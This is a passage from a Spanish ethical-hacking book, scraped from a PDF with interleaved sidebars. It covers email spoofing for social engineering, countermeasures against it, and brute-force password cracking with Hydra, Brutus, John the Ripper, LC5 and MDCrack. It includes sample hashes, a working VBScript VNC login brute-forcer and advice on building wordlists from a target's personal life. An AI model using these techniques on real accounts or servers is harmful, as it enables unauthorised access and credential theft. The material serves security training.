telnet) by smtpx.xxxx.com.ar with SMTP; 8 Jan 2007 00:00:00 - 0000Message-ID: <34235>From: < [emailprotected] >To: < [emailprotected] >Subject: Testeando envio de mails a mano.

X-Mailer: amano v2.0Subject: Testeando envio de mails a mano....

• Se puede confeccionar en html. Esto lo hace menos visible a los links maliciososo, hacia cosas maliciosas.

101

En el sitio http://www.us-cert.gov/cas/tips/ST04-014.html podrán encontrar (en inglés)consejos de como prevenir ataques de ingenieria social y phishing. Por Mindi McDowell

US-CERT aconseja

Hacking Etico - [PDF Document] (105)

Outlook. Un link en html hace menos visible un URL malicioso y por eso es fundamentalno ingresar (o hacerlo con mucho cuidado) en páginas que llegan a nuestro correo.

• Se puede declarar hacia qué casilla será enviada la respuesta del e-mail original:

From: “Remitente real falsificado” [emailprotected] // Emisor falso

Reply-To: [emailprotected] // Casilla de intruso

To: [emailprotected] // Casilla victima

En este caso, lo que sucede es que el intruso le envía un e-mail a la víctima anombre de un conocido de ésta y desde su respectiva casilla, pero que jamás saliódesde ella porque es un e-mail falso. Si no presta atención, esta víctima cuando

102

Es un listado de casillas de e-mail de confianza. Un modo de aplicación sería que con elcorreo interno, los empleados pudieran comunicarse entre sí, pero al hacerlo hacia fuera(Internet), sólo se lograra a través de una whitelist en la que figurarían clientes,proveedores, sucursales y casillas de confianza. Lo no incluido en la lista sería descartado.

Whitelist

Hacking Etico - [PDF Document] (106)

responda lo estará haciendo hacia la casilla del intruso.Más allá de estas características propias del e-mail, su contenido juega un papelimportante, ya que se pueden enviar links, archivos, historias inventadas y engañosde todo tipo. Así, es posible conseguir datos muy variados (por ejemplo, la planillade las 100 preguntas para amigos con su color preferido, película favorita, etcétera),acceder a mensajeros, listas de contactos y mucho más.

Libro. NNoo TTeecchh HHaacckkiinngg es una guía de ingeniería social,dduummppsstteerr ddiivviinngg (trashing) y sshhoouullddeerr ssuurrffiinngg (mirar claves por sobre

los hombros) escrita por Johnny Long y publicada por Syngress.

MEDIDAS CONTRA EL ENGAÑO

En las organizaciones serias que utilizan recursos y recaudos en cuanto a segu-ridad de la información, la ingeniería social es tomada como una potencial

103

Ética de los negocios: www.eseade.edu.ar/servicios/Libertas/11_5_Machan.pdf. Acercade la persuasión: www.cepvi.com/articulos/persuasion.shtml. Influir sobre las personas:http://encontrandoelexito.com/Ebooks/como_ganar_amigos_influir_sobre_las_personas.pdf. El paralenguaje: www.google.com/search?hl=es&q=paralenguaje.

Recursos relacionados con la ingeniería social

Hacking Etico - [PDF Document] (107)

amenaza a su activo: la información.A través del hacking ético, un profesional de seguridad intentará emular en laorganización estos ataques -como supimos al principio- a fin de lograr lo mismoque podría alcanzar esta vez un ingeniero social o intruso (ya sea un empleadodescontento o ex empleado, hacker, espía industrial, competencia). El propósito deesto es descubrir cuáles son los errores que se cometen en el trato con las personasen cuanto a divulgación de información supuestamente inofensiva y agentesexternos a través de los medios de comunicación o en persona, es decir, desde elmomento en que se la recibe en la empresa. Veamos ahora algunas medidas paramejorar este aspecto.

Se entrena a la gente mediante charlas (especialmente a las recepcionistas quetrabajan en mesa de entrada, a las telefonistas, al personal de seguridad, a lassecretarias y a los ejecutivos) acerca de esta fuga de información. También sedesarrollan políticas para el manejo interno de la información, su clasificación y lano descentralización de ésta por fuera del protocolo.Se llevan a cabo testeos éticos de seguridad (que no tendrán impacto en laorganización, sino que darán una noción de cómo está resguardada ante este tipode amenaza) como el que detallamos anteriormente, se realizarán pruebas como lade los pendrives-trampa y otros métodos más intrusivos. La finalidad de todo estoes que sirven tambien para mejorar el nivel de seguridad relacionado a accesosfísicos. En síntesis, los integrantes de todo el sistema deberían contar con estoselementos:

• Concientización institucional acerca de la ingeniería social.• Políticas internas que contemplen la descentralización de datos y el resguardo dela información.

• Políticas acerca del buen uso de recursos de comunicación e informáticos, porparte de todos los empleados.

• Lucidez mental.

De no ser así, es muy probable que el ingeniero social que tome a esa organizacióncomo objetivo, tarde o temprano consiga su fín y la comprometa.Lo más importante dentro de la organización es integrar a la gente que se desem-

104

Si deseamos conocer mejor la forma de actuar de un ingeniero social, hay que conocer aPatricio Peker. Es disertante acerca de la influencia y persuasión en las personas, y tratatemas como los patrones mentales, estrategias para diálogos, objeciones, negociados. Ladirección de su sitio es www.ganaropciones.com/peker.htm y sus mp3 son muy interesantes.

Actuación de ingenieros sociales

Hacking Etico - [PDF Document] (108)

peña en el sistema como parte del planeamiento estratégico de seguridad de la in-formación y concientizarla periódicamente a partir del mismo reclutamiento.

105

Contramedidas. Del documento Social Engineering Fundamentals, Part II: CombatStrategies de SSaarraahh GGrraannggeerr. www.securityfocus.com/infocus/1533

ÁÁrreeaa ddee rriieessggoo TTááccttiiccaa iinnttrruussiivvaa EEssttrraatteeggiiaa

Teléfono (recepcionista) Impersonalización ypersuación

Entrene a sus empleadospara que no den informaciónconfidencial ni passwords

Entrada de edificio Acceso físico no autorizado Personal de seguridad

Oficina Mirar sobre el hombro Vea si hay alguien presente

Teléfono (mesa de ayuda) Imper. en llamadas ayuda Utilice PINs

Oficina Búsqueda de puertasabiertas

Invitados y visitantesescoltados

Sala de correo Inserción de memos Cierre y monitoree

Sala de máquinas oteléfono de linea

Entrar, robar o plantarsniffer

Mantenga cerrado einventariado

Teléfono y PBX Robar linea Controle llamadas yrechace transferencias

Cestos de basura Extraer basura Monitoree, borre de modoseguro y destruya lo descartado.

Intranet e internet Plantar sniffersContinuo revisiones de loscambios en la red y uso de

los passwords

Oficina Robar datos sensibles Cierre y guarde todo.

General - Psicológico Impersonalización ypersuación

Entrene al personalperiodicamente

Hacking Etico - [PDF Document] (109)

106

www.secunia.com

Espacio dedicado a informar diariamente sobre vulnerabilidades de sistemas yaplicaciones en formato advisory (aviso con detalles técnicos) vía e-mail atodo aquel que se dé de alta en el boletín. Contiene noticias, documentostécnicos (whitepapers) que describen fallas, blog, panel de trabajos y muchomás.

http://hwagm.elhacker.net

Sitio web acerca de seguridad sobre tecnología WiFi. Proveen un CD live conherramientas para auditar este tipo de sistemas (wifislax) y un foroespecializado con gente dedicada al chequeo de redes inalámbricas que nos

Hacking Etico - [PDF Document] (110)

4 > Fuerzabruta

En este capítulo veremos cómo se lleva a

cabo esta técnica, conocida en inglés como

Brute Force. Conoceremos sus mecanismos, las

herramientas utilizadas, los modos, destinos

y tiempos, las clases de algoritmos por

descifrar y los servicios en donde es

posible auditar con ella accesos válidos del

tipo FTP, SSH, o POP3. Por otro lado,

conoceremos en detalle las causas que

inciden en los tiempos de resultado al

aplicarla.

Hacking Etico - [PDF Document] (111)

INTRODUCCIÓN A FUERZA BRUTA (FB)

When in doubt, use brute force.

Ken Thompson, Co-inventor de Unix.

Fuerza bruta es una técnica que proviene originalmente de la criptografía, en espe-cial del criptanálisis (el arte de romper códigos cifrados o descifrar textos). Es unamanera de resolver problemas mediante un algoritmo simple de programación, quese encarga de generar y de ir probando las diferentes posibilidades hasta dar con elresultado esperado o de mejor conveniencia.Los casos de fuerza bruta que describiremos en este capítulo están orientados a laacción de generar claves (mediante la combinación secuencial de caracteres) y aprobarlas en determinado servicio de autentificación o archivo para verificar sicoinciden con un login válido de acceso (usuario y clave o sólo clave). Por otro la-do, apuntan al proceso de romper el cifrado de archivos que contienen passwordsde sistemas operativos o cuentas de usuario de otras aplicaciones.Como profesionales éticos, podemos utilizar esta técnica y sus herramientas paraverificar la vulnerabilidad de lo que debemos proteger y solucionarla.

Clicks. Una forma ingeniosa de implementar un sistema de logueofunciona mediante una secuencia de clics en diferentes puntos visualesde una imagen. Este sistema (http://labs.mininova.org/passclicks/)

108

Hacking Etico - [PDF Document] (112)

Empleos y orientaciónEn seguridad informática, a veces es necesario llevar a cabo fuerza bruta para evi-tar el trabajo de probar a mano o generar combinaciones, algo que nos llevaría mu-cho tiempo de trabajo. Por ejemplo en estos siete casos:

• Si necesitamos descubrir determinado usuario o password de un servicio de au-tentificación como FTP, SSH o POP3 de manera remota a través de una red.

• Obtener el password de archivos del paquete Office u otras aplicaciones del tipocompresores (.rar, .zip, .mdb, .xls, .doc) de modo local.

Office. Solicitud de contraseña en base de datos de Access, que puede serfácilmente crackeada o rota, como vulgarmente se dice, o descubierta por fuerza bruta.

• En el caso de formularios web de autentificación que solicitan que ingresemosusuario y clave (validación online, .htaccess, intranets con logins).

109

La palabra encriptar no se encuentra incluida en el Diccionario de la Real AcademiaEspañola, ya que se trata de una deformación del término inglés to encrypt. Aunquesu uso está muy difundido, la palabra correcta es cifrar, que proviene de cifrado.

Encriptar no, cifrar.

Hacking Etico - [PDF Document] (113)

Weblogin. Solicitud de login (usuario y password) para ingresar en un repositoriode políticas para la gestión de la seguridad de la información en el sitio Segu-info.

• Para romper los cifrados típicos de los archivos shadow en Linux, Solaris y Unix,o los archivos hasheados SAM de la familia Windows.

• Para descifrar strings de datos cifrados, como las claves almacenadas en md5 delos foros, o passwords como los que están presentes en routers Cisco.

• Para calcular sesiones ID válidas de URLs en páginas de comercio electrónico uotro tipo de sitio web.

• Para aplicar fuerza bruta a una aplicación que cuenta con una interfaz gráfica (co-mo aquellas que fueron desarrolladas en Visual Basic, Powercobol, VisualFox oDelphi, entre otros lenguajes ). Esto puede ser hecho tanto de manera local, conautentificación de usuario, o remotamente, utilizando un cliente para ese servicio(como Viewer de VNC por ejemplo) y haciendo que éste automatice su intentopor lograr un login válido en el servidor.

110

El término hasheado se aplica en los casos en los que el password se encuentra ocul-to en algo llamado hash, que es un string más o menos así: f1a81d782dea3a19bd-ca383bffe68452. Luego de ser descifrado, quizás eso sea una clave del tipo c4r0l1n4.

Hasheado

Hacking Etico - [PDF Document] (114)

Pipper. Herramienta creada por Alberto Moro (Mandingo), muy útil pararealizar brute force sobre variables, cookies y credenciales o buscar CGIs,

SQL injection y XSS, entre otros (www.yoire.com/downloads.php?tag=pipper).

Ejemplos didácticosVeamos unos ejemplos para comprender mejor la aplicación de esta técnica.Fuerza bruta aplicada a usuarios de servicios de autentificación remota.Para realizar esto, utilizaremos la excelente herramienta Hydra sobre Linux y elveterano Brutus (win32) sobre Windows. Hydra se puede descargar de free-world.thc.org/releases.php y, para ver ejemplos de utilización, hay que leer el ar-chivo README. El sitio de Brutus es www.hoobie.net/brutus/, y los archivosde definición se encuentran en www.hoobie.net/brutus/brutus-application-defi-nition-files.html. Para aprender a utilizarlo, podemos buscar la frase Manual Bru-

111

Nombre de una maquina que utilizaba un sistema rotatorio para el cifrado de mensajesalla por los años 30’. Tenia fama de ser inviolable y fue utilizada inicialmente por losmilitares alemanes. Los polacos hicieron ingenieria inversa sobre una maquinacapturada a estos, para asi poder dar con la tecnica del desciframiento.

Enigma

Hacking Etico - [PDF Document] (115)

tus en Google. Cabe aclarar que las imágenes que utilizaremos en nuestrosejemplos están editadas por razones de confidencialidad.

En el primer ejemplo que veremos, el objetivo es determinar qué password tiene elusuario ctori en un servidor FTP.

Hydra. Aquí podemos ver cómo Hydra (ejecutado en una Shell y en su versiónvisual HydraGTK) encontró el password desde una lista de palabras (Pass.txt).

Como segundo ejemplo, supongamos que deseamos chequear algunas cuentas deusuario válidas (comprobando usuario y password de cada una de ellas) en la orga-nización objetivo (los datos de las cuentas fueron obtenidos mediante otras técni-cas). Veamos cómo se vería esto en la aplicación Brutus.

112

Si les interesa la criptografia, un libro de lectura obligada es: The Codebreakers. TheComprehensive History of Secret Communications fromAncient Times to the Internet. deDavid Khan. ISBN: 0684831309. Casi 1200 páginas muy interesantes acerca del tema.

The CODEBREAKERS

Hacking Etico - [PDF Document] (116)

1- Objetivo, ya sea dirección IP o dominio.2- Protocolo (POP3).3- Definir servidor proxy.4- Tiempos de espera de respuesta.5- Modo de formato de login en la lista de palabras (en este caso, configuradoen modo combo usuario:password).

6- Muestra los accesos válidos en el sistema.7- Muestra cuántos intentos hubo para dar con cada acceso válido.8- Muestra el tiempo estimado para terminar la tarea.9- Muestra los intentos en tiempo real.10- Resuelve el dominio a IP.11- Conexiones simultáneas de autentificación.12- Puerto.

113

Hacking Etico - [PDF Document] (117)

Fuerza bruta aplicada a cifradosPara esto, utilizaremos la herramienta John the Ripper (www.openwall.com-/john/), el conocido LC5 (antiguamente de @stake y ahora de Symantec) y MD-crack, todas corriendo sobre Windows. Para saber cómo utilizar la primera, pode-mos ver el contenido de la carpeta doc de la instalación. Antes detallaremos bási-camente tres elementos por descifrar con estas aplicaciones:

• SAM: proviene de plataformas Windows y se encuentra en el directorioC:\WINDOWS\system32\config. Contiene, entre otras cosas, las cuentas deusuarios con los passwords cifrados NTLM hash y LM hash.Un hash del archivo SAM luce así:Administrador:500:5AC9FFFB9464FFA6B9136263703A79E8:9E65AAFF0C32-CD68C624B442A07E369D:::.• Shadow: se encuentra en sistemas operativos como Linux, Solaris o Unix, y allíresiden las cuentas de usuarios y sus passwords cifrados (basados, por lo general,en algoritmo DES, SHA-1 o MD5). Se ubica usualmente en /etc/shadow y lucede esta manera: lucio:/8o7907AjGrGw:11370:0:99999:7::: ohomero:$1$9XSaYyhK$ZtVQCiSRf1mjgLvlCksZw0:12488:0:99999:7:::.

John. En 1 minuto y 26 segundos, con su algoritmo y el listado de palabras, descubrió elpassword de 126 cuentas. La primera fila es la de passwords en texto plano y la fila de la

derecha (editada) son los usuarios.• String md5: Es el almacenamiento en database de una contraseña como las de

114

Hacking Etico - [PDF Document] (118)

administración y usuarios de un foro o del cifrado online de determinadas con-traseñas que se utilizan en los Webmails como Yahoo y Hotmail.Luce de esta manera: a43dbaf5d2ea4ad642cb7f564260d905.

Como tercer ejemplo, descifraremos las cuentas extraídas del archivo sha-dow Linux.Los passwords deben estar en un archivo en texto plano, tipo lista, guardados conel nombre password.lst. Ingresando >john users.txt, el programa primero utiliza-rá su algoritmo para descubrir los usuarios que tienen el mismo pass que ID, lue-go hará un intento híbrido y después utilizará las palabras que están en el pass-word.lst una por una y combinándolas. Por último, realiza fuerza bruta generandopalabras al azar para ver cuál coincide. Si se desea utilizar otro diccionario, hay queutilizar la sintaxis >john –-wordlist=diccionario.lst users.txt.

En nuestro cuarto ejemplo, descifraremos las cuentas extraídas de un archivo SAMde Windows. LC5 es una buena alternativa si no se dispone de lo necesario parautilizar toda la capacidad de herramientas como Ophcrack, Rainbowcrack oCain & Abel, basadas en la recuperación de passwords a través de tablas rainbow(más adelante veremos en detalle esta técnica con un claro ejemplo).Estas últimas precisan tablas precomputadas que pesan varios GB, muy utiles en elcaso de necesitar descifrar passwords fuertes en poco tiempo.

Words. Selección de un diccionario de palabras en LC5

en la fase de configuración para proceder a recuperar passwords

obtenidos desde hashes dumpeadas desde el archivo SAM de Windows XP.

115

Hacking Etico - [PDF Document] (119)

Aunque no iguala el rendimiento que logran aquellas herramientas que utilizan rain-bow tables, LC5 es bastante eficaz en cuanto a comprobación, en especial desde dic-cionarios de palabras. Se descarga de www.securitylab.ru/_tools/lc5setup.exe y, pa-ra conocer y aprender más sobre la forma de utilizarlo, basta con ir al menú Help/Documentation. Como recomendación adicional, cabe mencionar que convieneeliminar los hash que no deseamos desencriptar como guest, los vacíos y otros, pa-ra así bajar considerablemente el tiempo de cómputo.

LC5. Aquí vemos a LC5 recuperando contraseñas

desde los hashes. En esta pantalla, se observan algunas

cuentas con sus respectivos passwords logrados en apenas minutos.

116

Hashes dumpeadas es un modismo (slang) del término inglés dump que significa vol-car las cuentas (extraer) cifradas de sistema del archivo SAM desde un sistema Win-dows, ya sea a través de Pwdump, Fgdump (http://swamp.foofus.net/fizzgig/fgdump/)o herramienta similar.

Hashes dumpeadas

Hacking Etico - [PDF Document] (120)

El quinto ejemplo que veremos consiste en descifrar una cuenta de usuario admi-nistrador de foro que se encuentra cifrada en md5. En el caso de que hayamos da-do con una clave de este tipo (por SQL injection en un foro o mediante la capturade tráfico con un sniffer), procederemos a utilizar MDCrack para descifrarlo.

Mdcrack. Aquí se descifra el hash 469098e537b96e7e87e3196b49a9f299perteneciente al usuario administrador de un foro, con un charset(juego de caracteres) 0123456789, tardando tan sólo 12 segundos.

MDCrack se descarga de http://membres.lycos.fr/mdcrack/ y podemos cono-cer detalles sobre su uso leyendo el FAQ dentro del archivo. Los algoritmos quepuede descifrar esta herramienta son los siguientes:

117

Es recomendable guardar las sesiones para luego estudiarlas y, por otro lado, paraque no se nos pierda nada del output de los comandos en consola (en un dumpeo porejemplo o al ver el contenido de un archivo). Promptpal (www. promptpal.com) y Se-cureCRT poseen logueo de sesión y algunas otras utilidades interesantes.

Guardar sesiones

Hacking Etico - [PDF Document] (121)

• Rsa MD2 MD4 MD5• Rfc 2104 HMAC-MD4 HMAC-MD5• FreeBSD MD5• Apache MD5• Microsoft NTLM1• Cisco PIX Enable/User• Cisco IOS• Invision Power Board 2.x• IEEE CRC32 CRC32-B• Mark Adler ADLER32• Generic MD4MD4: MD4(MD4(pass))• Generic MD4MD4S: MD4(MD4(pass).salt)• Generic PHP: MD5(hex(MD5(pass)))• Generic PHPS: MD5(hex(MD5(pass)).salt)

Texto-plano. www.plain-text.info es un sitio en dondese descifran passwords mediante un mecanismo distribuido,

empleando rainbow tables. El visitante puede adosar un hash y luegover su resultado. Comprende los cifrados lm, md5, ntlm y doble md5.

118

Para encontrar Crack string MD5 online, podemos visitar alguna de las siguientes di-recciones: www.tmto.org (suele estar temporalmente offline, pero es la mejor queexiste), http://gdataonline.com/seekhash.php, http://md5.thekaine.de o www-.milw0rm.com/cracker/insert.php.

MD5

Hacking Etico - [PDF Document] (122)

FB aplicada en archivos Office con clave

Como sexto ejemplo, recuperaremos el password de un archivo con extensión delpaquete Office o un archivo comprimido. Es normal que en ofimática (relaciona-do a informática de oficina) se utilicen passwords en archivos de Excel, Word, Ac-cess, Zip y Rar para proteger su contenido.

Rixler. En el sitio web de la empresa Rixler(www.rixler.com) podemos encontrar una aplicación

llamada Word Password Recovery Master que, instantáneamente, puededescifrar el password de un documento Word (ya sea de write, open o protection).

A este tipo de documentos, se los suele encontrar en las intranets o terminales delas organizaciones, y la auditoría de este tipo de passwords suele tomar poco tiem-

119

La criptografía asimétrica es el método criptográfico que utiliza PGP, se basa en dosllaves, una publica y otra privada. La primera puede darse a cualquiera mientras la otradebe ser mantenida en cuidado por el dueño.

Criptografía Asimétrica

Hacking Etico - [PDF Document] (123)

po, debido a lo débil de su elección por parte del oficinista o ejecutivo. La herra-mienta para esto es Passware Kit, y se puede descargar de www.lostpassword-.com/kit.htm. Para comprender su uso, hay que leer el Passware kit Help de la ins-talación.

Access. Esta herramienta recupera casiinstantáneamente el password de un fichero .mdb

(database Access). Aquí vemos una de las pantallas de configuración.

FB aplicada a la interfaz gráficaNuestro séptimo ejemplo consiste en descubrir el password de un servidor VNC através de la interfaz gráfica de su cliente. En Internet se puede encontrar un sim-ple script programado en VBScript, que demuestra cómo es posible, mediante unaaplicación visual (cliente), realizar brute force hacia el servidor, de manera local y,en este caso, con incidencia en el server remoto.El script en principio funcionaba con una versión anterior y en inglés de Radmin,un administrador remoto (www.sensepost.com/videostatic/vbs/vbs.html), pero

120

Hacking Etico - [PDF Document] (124)

como es difícil conseguir la versión necesaria para testearlo, a continuación ve-remos el script modificado para que sirva con la última versión gratuita de VNCen español (VNC Free Edition for Windows Version 4.1.2, que podemosencontrar en www.realvnc.com/cgi-bin/download.cgi).

...8<

‘Quick and dirty .vbs bruteforcer‘Original for Radmin by haroon at sensepost‘Adaptado para VNC en español por Carlos Tori

Dim objFSO, objTS, s, aFileSet objFSO = CreateObject(“Scripting.FileSystemObject”)Set objTS = objFSO.OpenTextFile(“palabras.txt”)

s = objTS.ReadAll‘Now, use split to load the contents of the file into a arrayaFile = split(s, vbCrLf)

Msgbox “Names Loaded..”set WshShell = CreateObject(“WScript.Shell”)

‘Launch from the command line and wait for a secondWshShell.Run “C:\Archiv~1\RealVNC\VNC4\vncviewer.exe”WScript.Sleep 1000

For Each pass in aFilewhile WshShell.AppActivate(“VNC Viewer”) = FALSE

wscript.sleep 1000Wend

121

Criptografía de Curva Elíptica (CCE) es una variante basada en las matemáticas de lascurvas elipticas como alternativa a la variante de criptografia asimetrica. Fuepropuesta por Neal Koblitz y Victor Miller en 1985. -Fuente: Wikipedia-

Criptografía de Curva Elíptica

Hacking Etico - [PDF Document] (125)

‘Broing the aplication to the foregroundWshShell.AppActivate “VNC Viewer”WScript.Sleep 200

‘Send altc, t, ip, enterWshShell.SendKeys “%c”

WScript.Sleep 200WshShell.SendKeys “200.000.000.000”‘CAMBIAR ESTA IPWScript.Sleep 200WshShell.SendKeys “{TAB}”WScript.Sleep 200WshShell.SendKeys “{ENTER}”WScript.Sleep 200‘Send the passwordWshShell.SendKeys passWshShell.SendKeys “{ENTER}”

WScript.Sleep 300

if WshShell.AppActivate(“200.000.000.000”) = True thenMsgbox paswscript.quit

End if

Next

...8<

Uso de este script: si deseamos testearlo, podemos escribir este código tal cual es-tá en un editor de texto (Notepad o Wordpad, por ejemplo) y guardarlo comovnc.vbs. En el mismo lugar en donde está ese archivo, debemos tener guardado

122

En esta página, http://groups.google.com/group/sci.crypt se encuentra un grupo degente aficionada a los algoritmos y cifrados, como también mucho material acerca deltema.

Lista de correo

Hacking Etico - [PDF Document] (126)

el archivo palabras.txt con la lista de passwords que deseamos probar en el servi-dor VNC. Previamente hay que instalar VNC Viewer, reemplazar la IP del códigopor la IP del server VNC remoto y, por último, ejecutar el script haciendo click so-bre él. Les cuento que, en caso de acceder a un recurso remoto con este cliente, laIP de esa sesión quedará grabada en la siguiente clave de registro: HKEY_CU-RRENT_USER\Software\RealVNC\VNCViewer4\MRU. (Gracias a HaroonMeer y Charl van der Walt -SensePost Information Security- por su gentileza).

FACTORES QUE INCIDEN EN EL TIEMPO

Al utilizar aplicaciones de terceros o scripts programados por uno que intenta des-cifrar o acertar passwords, existe una serie de factores que pueden llevar a que és-tos tarden demasiado tiempo o muy poco en lograr el objetivo.El tiempo es muy valioso en la seguridad informática, y una desconsideración quetenga incidencia en éste puede hacer que un atacante real, en lugar de tardar 2300años en acertar un password mediante fuerza bruta o deducción analítica, lo hagaen un puñado de horas o en apenas minutos.Por la gran importancia de esto, entonces, en las próximas páginas conoceremoslas diez principales variables que inciden en el tiempo de lograr un resultado satis-factorio o el más conveniente.

1. La clave por descifrar es fuerte o lo es su cifrado, debido a la complejidad quedará el número de caracteres y la combinación o entropía (término de la física quesignifica desorden) de éstos, ya sean letras, números, mayúsculas, caracteres espe-ciales y distintos símbolos. Una clave como ésta complica demasiado la técnica debrute force. Antes de gastar días, meses o años, es posible que se tarde menos enblanquear ese password, sniffearlo, lograr un usuario de un mismo nivel de privi-legio en el sistema o hacer llegar ese login (reestablecido) hacia una casilla de e-mail.

2. Charset elegido: El charset es un juego de caracteres (character set) que pue-de ser 0123456789, abcdefghijkl...z o mayúsculas; existe también el charset de

123

El momento en el que los servidores más reciben Brute Force de modo remoto es el finde semana. ¿Por qué? Por un lado, el intruso del tipo script kiddie está libre porque notiene clases y, por otro lado, el intruso experimentado sabe que el administrador, en lamayoría de las empresas chicas y medianas, vuelve recién el lunes por la mañana.

Momentos de ataque

Hacking Etico - [PDF Document] (127)

caracteres especiales. El charset ligado al trabajo de brute force puede ser unode estos rangos, la combinación de ellos, su totalidad o sólo algunos caracteres seleccionados. Si se ataca un password cifrado de sólo números con un charset demuchos caracteres, la combinación de éstos será muchísimo más elevada que si seelige sólo el charset de números. Otro motivo por el que debemos conocer el sistema es que, por ejemplo, si la aplicación aclara en su sitio introduzca su clave de4 dígitos, ¿para qué darle brute force a su password cifrado (en caso de que lo hayamos obtenido) o servicio con un charset completo? Con sólo intentar el charsetde números, en pocos segundos lo descifrará.

Caracteres. Sitio de Juan Aqueveque, con interesantes notas acerca de loscaracteres y estándares relacionados que utilizamos a diario. www.juque.cl/weblog/2006/01/25/ascii-unicode-utf8-y-la-iatarnaaianalizaaian-parte-i.html.

124

Recordemos que siempre es conveniente leer código ajeno, analizar sobre por qué se escribióasí e interpretarlo. También es bueno portarlo a otras cosas y a otros lenguajes y, en lo posi-ble, depurarlo o mejorarlo. Colaborar en proyectos Open Source es bueno, ya que de ese mo-do se aprende mucho en poco tiempo. No dudemos en pedir ayuda a otros.

Código ajeno

Hacking Etico - [PDF Document] (128)

3. Utilización de diccionarios de palabras: El empleo de éstos contra archivosde cuentas cifradas a través de un diccionario de palabras predefinidas da muybuenos resultados, especialmente si el diccionario está confeccionado de mane-ra inteligente. Veamos las clases de palabras que debería tener, con ejemplos depasswords entre paréntesis.

• Todas las palabras del diccionario español e inglés.• Números del cero hasta N.• Passwords por defecto (admin).• Passwords comúnmente utilizados (qwerty, 123456).• Nombres (romina, leonel) y diminutivos (rominita).• Palabras del slang o lunfardo regional (copado, chabón).• Oficios y trabajos (arquitecta, ingeniera, gerente, operadores).• Fechas en formato ddmmaaaa o ddmmaa (desde el año 1900 a hoy, por cum-pleaños y aniversarios).• Passwords extraídos de otras bases de datos.

La aplicación que sea la encargada de la comprobación generará un hash de ca-da una de las palabras y la comparará con la existente por descifrar. Si coinci-de, la dará como matcheada (coincidencia) y la reportará como un resultado vá-lido. Este método no es utilizado en aquellas que ya tengan tablas precomputa-das, como Ophcrack.

4. Técnica de brute force en modo híbrido: Es similar a la utilización del dic-cionario, pero combinando cada palabra con algunos caracteres al final o delan-te de cada una de esas palabras allí contenidas. Por ejemplo, en el diccionario es-tá la palabra marciano, entonces el script o programa intentará: marciano6, mar-ciano7, marciano8, etcétera. Los caracteres que pone al final de cada palabra es-tarán definidos por nosotros en su configuración, cantidad y tipo de charset.También se pueden unir dos palabras de un mismo diccionario, como por ejem-plo, marcianoamarillo, marcianoverde, marcianolila, marcianoblanco, etcétera.

125

En las páginas con login, algunas aplicaciones devuelven un mensaje de error del tipoUsuario inexistente. Eso invita a descubrir usuarios del sistema, ya que cuando acer-temos un usuario que existe no recibiremos ese aviso y conoceremos así su existencia.Es un grave error, y es mejor implementar el mensaje: Combinación incorrecta.

Login online

Hacking Etico - [PDF Document] (129)

5. Brute force según patrón, passwords generados a mano según objetivo:Esta técnica, combinada con los datos extraídos mediante information gatheringe ingeniería social, suelen dar frutos rápido. Se basa pura y exclusivamente en de-linear una serie de palabras o de passwords sobre la base del conocimiento pre-vio que tenemos de la organización u objetivo. A los tipos de passwords nom-brados para agregar en los diccionarios, tendríamos que adicionarles las siguien-tes:

• Número de DNI (00000000).• Equipo de deporte favorito (riverplate, boca, pumas, leonas).• Bandas de música favoritas (sodastereo, divididos, miranda).• Títulos de libros favoritos (zaratustra, yoclaudio, elalquimista).• Letras de libros o segmentos (invisiblealosojos).• Títulos de canciones (blackbird, michelle, teparatres).• Letras de canciones o segmentos.• Nombres propios, de parientes o seres queridos: padres, hermanos, abuelo,abuela, bisabuelos, esposas, amantes, parejas, hijo, sobrinos, novias, ahijados ynietos (jorge, martin, hugo, elvira, apolonio, susana, lorena, maria, gustavo, lu-cas, natalia, jezabel, jeremias) apodos de éstos también: (negra, mona, tato, pu-chi, loli, charly, titina, pupi, tito, pipi, manguera, pepe, pipo, pichi, colo).• Nombre de mascotas (tobby, atila, chunchuna, mora, negrita).• Nombres de barrios.• Número de asociado a alguna entidad.• Números de la suerte.• Nombre del ISP, organización, institución o universidad, del objetivo.• Cosas relacionadas con sus estudios, hobby o trabajo.• Ídolos favoritos musicales, reales, ficticios o históricos (lennon, messi, poke-mon, napoleon).• Todo aquel otro gusto o preferencia que se le conozca a la persona, comomarcas de ropa, de auto, de perfume, etcétera.• Todos los anteriores seguidos de números en modo híbrido.• Passwords históricos de éste o los que utilice en otro lugar.

126

¿Qué haríamos si tuviésemos una máquina exclusivamente para romper cifrados queprobara 90 mil millones de keys DES por segundo? Con semejante cantidad, se podríadescifrar cualquier /etc/shadow completo en menos de cinco días. Podemos leer infor-mación sobre esto en www. cryptography.com/resources/whitepapers/DES-photos.html.

Máquina

Hacking Etico - [PDF Document] (130)

6. Intentar probar usuarios y passwords, ambos por azar y de manera remo-ta a servicios de autentificación: esto es una total pérdida de tiempo y es el mé-todo que más engorda logs de servidores (archivos de registros que contienen losintentos fallidos contra el servidor) cuando no se tiene noción de la técnica BF yse trata de aplicar a servicios online. Las combinaciones de esta clase son infini-tas e inútiles.Hay dos casos, pero ya no son de user y pass al azar, que es cuando dispone-mos de un objetivo en determinado rango que, posiblemente, contenga usua-rios y passwords por defecto de fábrica o bien si nos disponemos a comprobaren una base de datos cuáles combinaciones son aún válidas en determinado ser-vidor, de modo que se probaría en este formato:• user1:supasswordhistorico• user2:supasswordhistorico• user3:supasswordhistoricoEs decir, cada usuario con su respectivo password que en algún momento fueválido o aún lo es. La forma lógica de utilizar brute force de manera remota esconociendo al usuario de sistema (viendo de antemano el archivo /etc/passwda través de un error de programación de la página o a través de Google comousuario de correo, al dejar su e-mail escrito por allí, por dar dos ejemplos sim-ples).

Default. Es muy útil buscar listas actualizadas de claves por defecto.www.phenoelit-us.org/dpl/dpl.html

7. Ancho de banda: Existe una gran diferencia entre hacer brute force sobre un

127

Fuerza bruta no es la mejor técnica, pero a veces es necesaria. Utilizada de manera lógi-ca, puede llegar a ahorrar mucho tiempo. No debemos esperar resultados frente al moni-tor, es mejor dedicar una máquina a ello y usar otra terminal, o dejarla trabajando cuandoestamos fuera o durmiendo. Así, la PC estará con todo el poder del micro dedicado a ello.

Fuerza bruta

Hacking Etico - [PDF Document] (131)

servicio online conectado desde de un teléfono (dial up) y en hacerlo desde unashell que posee la velocidad de un caño de varios megas de transferencia porsegundo. Por eso, un intruso (malicious people como las cataloga Secunia ensu Weekly Summary) suele hacerlo desde una shell o servidor muy potente quecuenta con gran velocidad para la transmisión de datos.

